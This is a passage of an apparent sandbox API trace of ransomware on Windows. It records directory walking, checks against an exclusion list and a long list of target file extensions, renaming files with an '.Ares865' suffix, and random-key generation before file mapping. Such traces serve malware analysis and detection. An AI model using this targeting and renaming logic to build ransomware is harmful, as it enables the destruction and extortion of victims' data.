(lpString1="ico", lpString2="vis") returned -1 [0089.408] lstrlenW (lpString="vpd") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.408] lstrlenW (lpString="vvv") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.408] lstrlenW (lpString="wdb") returned 3 [0089.408] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.408] lstrlenW (lpString="wmdb") returned 4 [0089.408] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.408] lstrlenW (lpString="wrk") returned 3 [0089.409] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.409] lstrlenW (lpString="xdb") returned 3 [0089.409] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.409] lstrlenW (lpString="xld") returned 3 [0089.409] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.409] lstrlenW (lpString="xmlff") returned 5 [0089.409] lstrcmpiW (lpString1="s.ico", lpString2="xmlff") returned -1 [0089.409] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.Ares865") returned 107 [0089.409] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.ares865"), dwFlags=0x1) returned 1 [0089.410] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.410] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51881) returned 1 [0089.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.410] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.410] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.411] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.411] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.411] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcdb0, lpName=0x0) returned 0x15c [0089.412] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcdb0) returned 0x190000 [0089.416] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.417] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.417] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.417] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0089.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0089.417] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.417] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.418] CloseHandle (hObject=0x15c) returned 1 [0089.418] CloseHandle (hObject=0x118) returned 1 [0089.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.418] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d17f5a, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d17f5a, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c1f3d69, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x10850, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.ico", cAlternateFileName="")) returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="aoldtz.exe") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2=".") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="..") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="windows") returned -1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="bootmgr") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="temp") returned -1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="pagefile.sys") returned 1 [0089.418] lstrcmpiW (lpString1="settings.ico", lpString2="boot") returned 1 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2="ids.txt") returned 1 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2="ntuser.dat") returned 1 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2="perflogs") returned 1 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2="MSBuild") returned 1 [0089.419] lstrlenW (lpString="settings.ico") returned 12 [0089.419] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\ringtones.ico") returned 99 [0089.419] lstrcpyW (in: lpString1=0x2cce4ac, lpString2="settings.ico" | out: lpString1="settings.ico") returned="settings.ico" [0089.419] lstrlenW (lpString="settings.ico") returned 12 [0089.419] lstrlenW (lpString="Ares865") returned 7 [0089.419] lstrcmpiW (lpString1="ngs.ico", lpString2="Ares865") returned 1 [0089.419] lstrlenW (lpString=".dll") returned 4 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2=".dll") returned 1 [0089.419] lstrlenW (lpString=".lnk") returned 4 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2=".lnk") returned 1 [0089.419] lstrlenW (lpString=".ini") returned 4 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2=".ini") returned 1 [0089.419] lstrlenW (lpString=".sys") returned 4 [0089.419] lstrcmpiW (lpString1="settings.ico", lpString2=".sys") returned 1 [0089.419] lstrlenW (lpString="settings.ico") returned 12 [0089.419] lstrlenW (lpString="bak") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="bak") returned 1 [0089.419] lstrlenW (lpString="ba_") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="ba_") returned 1 [0089.419] lstrlenW (lpString="dbb") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="dbb") returned 1 [0089.419] lstrlenW (lpString="vmdk") returned 4 [0089.419] lstrcmpiW (lpString1=".ico", lpString2="vmdk") returned -1 [0089.419] lstrlenW (lpString="rar") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="rar") returned -1 [0089.419] lstrlenW (lpString="zip") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="zip") returned -1 [0089.419] lstrlenW (lpString="tgz") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="tgz") returned -1 [0089.419] lstrlenW (lpString="vbox") returned 4 [0089.419] lstrcmpiW (lpString1=".ico", lpString2="vbox") returned -1 [0089.419] lstrlenW (lpString="vdi") returned 3 [0089.419] lstrcmpiW (lpString1="ico", lpString2="vdi") returned -1 [0089.419] lstrlenW (lpString="vhd") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="vhd") returned -1 [0089.420] lstrlenW (lpString="vhdx") returned 4 [0089.420] lstrcmpiW (lpString1=".ico", lpString2="vhdx") returned -1 [0089.420] lstrlenW (lpString="avhd") returned 4 [0089.420] lstrcmpiW (lpString1=".ico", lpString2="avhd") returned -1 [0089.420] lstrlenW (lpString="db") returned 2 [0089.420] lstrcmpiW (lpString1="co", lpString2="db") returned -1 [0089.420] lstrlenW (lpString="db2") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="db2") returned 1 [0089.420] lstrlenW (lpString="db3") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="db3") returned 1 [0089.420] lstrlenW (lpString="dbf") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="dbf") returned 1 [0089.420] lstrlenW (lpString="mdf") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="mdf") returned -1 [0089.420] lstrlenW (lpString="mdb") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="mdb") returned -1 [0089.420] lstrlenW (lpString="sql") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="sql") returned -1 [0089.420] lstrlenW (lpString="sqlite") returned 6 [0089.420] lstrcmpiW (lpString1="gs.ico", lpString2="sqlite") returned -1 [0089.420] lstrlenW (lpString="sqlite3") returned 7 [0089.420] lstrcmpiW (lpString1="ngs.ico", lpString2="sqlite3") returned -1 [0089.420] lstrlenW (lpString="sqlitedb") returned 8 [0089.420] lstrcmpiW (lpString1="ings.ico", lpString2="sqlitedb") returned -1 [0089.420] lstrlenW (lpString="xml") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="xml") returned -1 [0089.420] lstrlenW (lpString="$er") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="$er") returned 1 [0089.420] lstrlenW (lpString="4dd") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="4dd") returned 1 [0089.420] lstrlenW (lpString="4dl") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="4dl") returned 1 [0089.420] lstrlenW (lpString="^^^") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="^^^") returned 1 [0089.420] lstrlenW (lpString="abs") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="abs") returned 1 [0089.420] lstrlenW (lpString="abx") returned 3 [0089.420] lstrcmpiW (lpString1="ico", lpString2="abx") returned 1 [0089.421] lstrlenW (lpString="accdb") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accdb") returned 1 [0089.421] lstrlenW (lpString="accdc") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accdc") returned 1 [0089.421] lstrlenW (lpString="accde") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accde") returned 1 [0089.421] lstrlenW (lpString="accdr") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accdr") returned 1 [0089.421] lstrlenW (lpString="accdt") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accdt") returned 1 [0089.421] lstrlenW (lpString="accdw") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accdw") returned 1 [0089.421] lstrlenW (lpString="accft") returned 5 [0089.421] lstrcmpiW (lpString1="s.ico", lpString2="accft") returned 1 [0089.421] lstrlenW (lpString="adb") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.421] lstrlenW (lpString="adb") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="adb") returned 1 [0089.421] lstrlenW (lpString="ade") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="ade") returned 1 [0089.421] lstrlenW (lpString="adf") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="adf") returned 1 [0089.421] lstrlenW (lpString="adn") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="adn") returned 1 [0089.421] lstrlenW (lpString="adp") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="adp") returned 1 [0089.421] lstrlenW (lpString="alf") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="alf") returned 1 [0089.421] lstrlenW (lpString="ask") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="ask") returned 1 [0089.421] lstrlenW (lpString="btr") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="btr") returned 1 [0089.421] lstrlenW (lpString="cat") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="cat") returned 1 [0089.421] lstrlenW (lpString="cdb") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="cdb") returned 1 [0089.421] lstrlenW (lpString="ckp") returned 3 [0089.421] lstrcmpiW (lpString1="ico", lpString2="ckp") returned 1 [0089.421] lstrlenW (lpString="cma") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="cma") returned 1 [0089.422] lstrlenW (lpString="cpd") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="cpd") returned 1 [0089.422] lstrlenW (lpString="dacpac") returned 6 [0089.422] lstrcmpiW (lpString1="gs.ico", lpString2="dacpac") returned 1 [0089.422] lstrlenW (lpString="dad") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dad") returned 1 [0089.422] lstrlenW (lpString="dadiagrams") returned 10 [0089.422] lstrcmpiW (lpString1="ttings.ico", lpString2="dadiagrams") returned 1 [0089.422] lstrlenW (lpString="daschema") returned 8 [0089.422] lstrcmpiW (lpString1="ings.ico", lpString2="daschema") returned 1 [0089.422] lstrlenW (lpString="db-journal") returned 10 [0089.422] lstrcmpiW (lpString1="ttings.ico", lpString2="db-journal") returned 1 [0089.422] lstrlenW (lpString="db-shm") returned 6 [0089.422] lstrcmpiW (lpString1="gs.ico", lpString2="db-shm") returned 1 [0089.422] lstrlenW (lpString="db-wal") returned 6 [0089.422] lstrcmpiW (lpString1="gs.ico", lpString2="db-wal") returned 1 [0089.422] lstrlenW (lpString="dbc") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dbc") returned 1 [0089.422] lstrlenW (lpString="dbs") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dbs") returned 1 [0089.422] lstrlenW (lpString="dbt") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dbt") returned 1 [0089.422] lstrlenW (lpString="dbv") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dbv") returned 1 [0089.422] lstrlenW (lpString="dbx") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dbx") returned 1 [0089.422] lstrlenW (lpString="dcb") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dcb") returned 1 [0089.422] lstrlenW (lpString="dct") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dct") returned 1 [0089.422] lstrlenW (lpString="dcx") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dcx") returned 1 [0089.422] lstrlenW (lpString="ddl") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="ddl") returned 1 [0089.422] lstrlenW (lpString="dlis") returned 4 [0089.422] lstrcmpiW (lpString1=".ico", lpString2="dlis") returned -1 [0089.422] lstrlenW (lpString="dp1") returned 3 [0089.422] lstrcmpiW (lpString1="ico", lpString2="dp1") returned 1 [0089.423] lstrlenW (lpString="dqy") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="dqy") returned 1 [0089.423] lstrlenW (lpString="dsk") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="dsk") returned 1 [0089.423] lstrlenW (lpString="dsn") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="dsn") returned 1 [0089.423] lstrlenW (lpString="dtsx") returned 4 [0089.423] lstrcmpiW (lpString1=".ico", lpString2="dtsx") returned -1 [0089.423] lstrlenW (lpString="dxl") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="dxl") returned 1 [0089.423] lstrlenW (lpString="eco") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="eco") returned 1 [0089.423] lstrlenW (lpString="ecx") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="ecx") returned 1 [0089.423] lstrlenW (lpString="edb") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="edb") returned 1 [0089.423] lstrlenW (lpString="epim") returned 4 [0089.423] lstrcmpiW (lpString1=".ico", lpString2="epim") returned -1 [0089.423] lstrlenW (lpString="fcd") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fcd") returned 1 [0089.423] lstrlenW (lpString="fdb") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fdb") returned 1 [0089.423] lstrlenW (lpString="fic") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fic") returned 1 [0089.423] lstrlenW (lpString="flexolibrary") returned 12 [0089.423] lstrlenW (lpString="fm5") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fm5") returned 1 [0089.423] lstrlenW (lpString="fmp") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fmp") returned 1 [0089.423] lstrlenW (lpString="fmp12") returned 5 [0089.423] lstrcmpiW (lpString1="s.ico", lpString2="fmp12") returned 1 [0089.423] lstrlenW (lpString="fmpsl") returned 5 [0089.423] lstrcmpiW (lpString1="s.ico", lpString2="fmpsl") returned 1 [0089.423] lstrlenW (lpString="fol") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fol") returned 1 [0089.423] lstrlenW (lpString="fp3") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fp3") returned 1 [0089.423] lstrlenW (lpString="fp4") returned 3 [0089.423] lstrcmpiW (lpString1="ico", lpString2="fp4") returned 1 [0089.424] lstrlenW (lpString="fp5") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="fp5") returned 1 [0089.424] lstrlenW (lpString="fp7") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="fp7") returned 1 [0089.424] lstrlenW (lpString="fpt") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="fpt") returned 1 [0089.424] lstrlenW (lpString="frm") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="frm") returned 1 [0089.424] lstrlenW (lpString="gdb") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.424] lstrlenW (lpString="gdb") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="gdb") returned 1 [0089.424] lstrlenW (lpString="grdb") returned 4 [0089.424] lstrcmpiW (lpString1=".ico", lpString2="grdb") returned -1 [0089.424] lstrlenW (lpString="gwi") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="gwi") returned 1 [0089.424] lstrlenW (lpString="hdb") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="hdb") returned 1 [0089.424] lstrlenW (lpString="his") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="his") returned 1 [0089.424] lstrlenW (lpString="ib") returned 2 [0089.424] lstrcmpiW (lpString1="co", lpString2="ib") returned -1 [0089.424] lstrlenW (lpString="idb") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="idb") returned -1 [0089.424] lstrlenW (lpString="ihx") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="ihx") returned -1 [0089.424] lstrlenW (lpString="itdb") returned 4 [0089.424] lstrcmpiW (lpString1=".ico", lpString2="itdb") returned -1 [0089.424] lstrlenW (lpString="itw") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="itw") returned -1 [0089.424] lstrlenW (lpString="jet") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="jet") returned -1 [0089.424] lstrlenW (lpString="jtx") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="jtx") returned -1 [0089.424] lstrlenW (lpString="kdb") returned 3 [0089.424] lstrcmpiW (lpString1="ico", lpString2="kdb") returned -1 [0089.424] lstrlenW (lpString="kexi") returned 4 [0089.424] lstrcmpiW (lpString1=".ico", lpString2="kexi") returned -1 [0089.424] lstrlenW (lpString="kexic") returned 5 [0089.425] lstrcmpiW (lpString1="s.ico", lpString2="kexic") returned 1 [0089.425] lstrlenW (lpString="kexis") returned 5 [0089.425] lstrcmpiW (lpString1="s.ico", lpString2="kexis") returned 1 [0089.425] lstrlenW (lpString="lgc") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="lgc") returned -1 [0089.425] lstrlenW (lpString="lwx") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="lwx") returned -1 [0089.425] lstrlenW (lpString="maf") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="maf") returned -1 [0089.425] lstrlenW (lpString="maq") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="maq") returned -1 [0089.425] lstrlenW (lpString="mar") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mar") returned -1 [0089.425] lstrlenW (lpString="marshal") returned 7 [0089.425] lstrcmpiW (lpString1="ngs.ico", lpString2="marshal") returned 1 [0089.425] lstrlenW (lpString="mas") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mas") returned -1 [0089.425] lstrlenW (lpString="mav") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mav") returned -1 [0089.425] lstrlenW (lpString="maw") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="maw") returned -1 [0089.425] lstrlenW (lpString="mdbhtml") returned 7 [0089.425] lstrcmpiW (lpString1="ngs.ico", lpString2="mdbhtml") returned 1 [0089.425] lstrlenW (lpString="mdn") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mdn") returned -1 [0089.425] lstrlenW (lpString="mdt") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mdt") returned -1 [0089.425] lstrlenW (lpString="mfd") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mfd") returned -1 [0089.425] lstrlenW (lpString="mpd") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mpd") returned -1 [0089.425] lstrlenW (lpString="mrg") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mrg") returned -1 [0089.425] lstrlenW (lpString="mud") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mud") returned -1 [0089.425] lstrlenW (lpString="mwb") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="mwb") returned -1 [0089.425] lstrlenW (lpString="myd") returned 3 [0089.425] lstrcmpiW (lpString1="ico", lpString2="myd") returned -1 [0089.426] lstrlenW (lpString="ndf") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="ndf") returned -1 [0089.426] lstrlenW (lpString="nnt") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="nnt") returned -1 [0089.426] lstrlenW (lpString="nrmlib") returned 6 [0089.426] lstrcmpiW (lpString1="gs.ico", lpString2="nrmlib") returned -1 [0089.426] lstrlenW (lpString="ns2") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="ns2") returned -1 [0089.426] lstrlenW (lpString="ns3") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="ns3") returned -1 [0089.426] lstrlenW (lpString="ns4") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="ns4") returned -1 [0089.426] lstrlenW (lpString="nsf") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="nsf") returned -1 [0089.426] lstrlenW (lpString="nv") returned 2 [0089.426] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.426] lstrlenW (lpString="nv2") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.426] lstrlenW (lpString="nwdb") returned 4 [0089.426] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.426] lstrlenW (lpString="nyf") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.426] lstrlenW (lpString="odb") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.426] lstrlenW (lpString="odb") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.426] lstrlenW (lpString="oqy") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.426] lstrlenW (lpString="ora") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.426] lstrlenW (lpString="orx") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.426] lstrlenW (lpString="owc") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.426] lstrlenW (lpString="p96") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.426] lstrlenW (lpString="p97") returned 3 [0089.426] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.426] lstrlenW (lpString="pan") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.427] lstrlenW (lpString="pdb") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.427] lstrlenW (lpString="pdm") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.427] lstrlenW (lpString="pnz") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.427] lstrlenW (lpString="qry") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.427] lstrlenW (lpString="qvd") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.427] lstrlenW (lpString="rbf") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.427] lstrlenW (lpString="rctd") returned 4 [0089.427] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.427] lstrlenW (lpString="rod") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.427] lstrlenW (lpString="rodx") returned 4 [0089.427] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.427] lstrlenW (lpString="rpd") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.427] lstrlenW (lpString="rsd") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.427] lstrlenW (lpString="sas7bdat") returned 8 [0089.427] lstrcmpiW (lpString1="ings.ico", lpString2="sas7bdat") returned -1 [0089.427] lstrlenW (lpString="sbf") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.427] lstrlenW (lpString="scx") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.427] lstrlenW (lpString="sdb") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.427] lstrlenW (lpString="sdc") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.427] lstrlenW (lpString="sdf") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.427] lstrlenW (lpString="sis") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.427] lstrlenW (lpString="spq") returned 3 [0089.427] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.428] lstrlenW (lpString="te") returned 2 [0089.428] lstrcmpiW (lpString1="co", 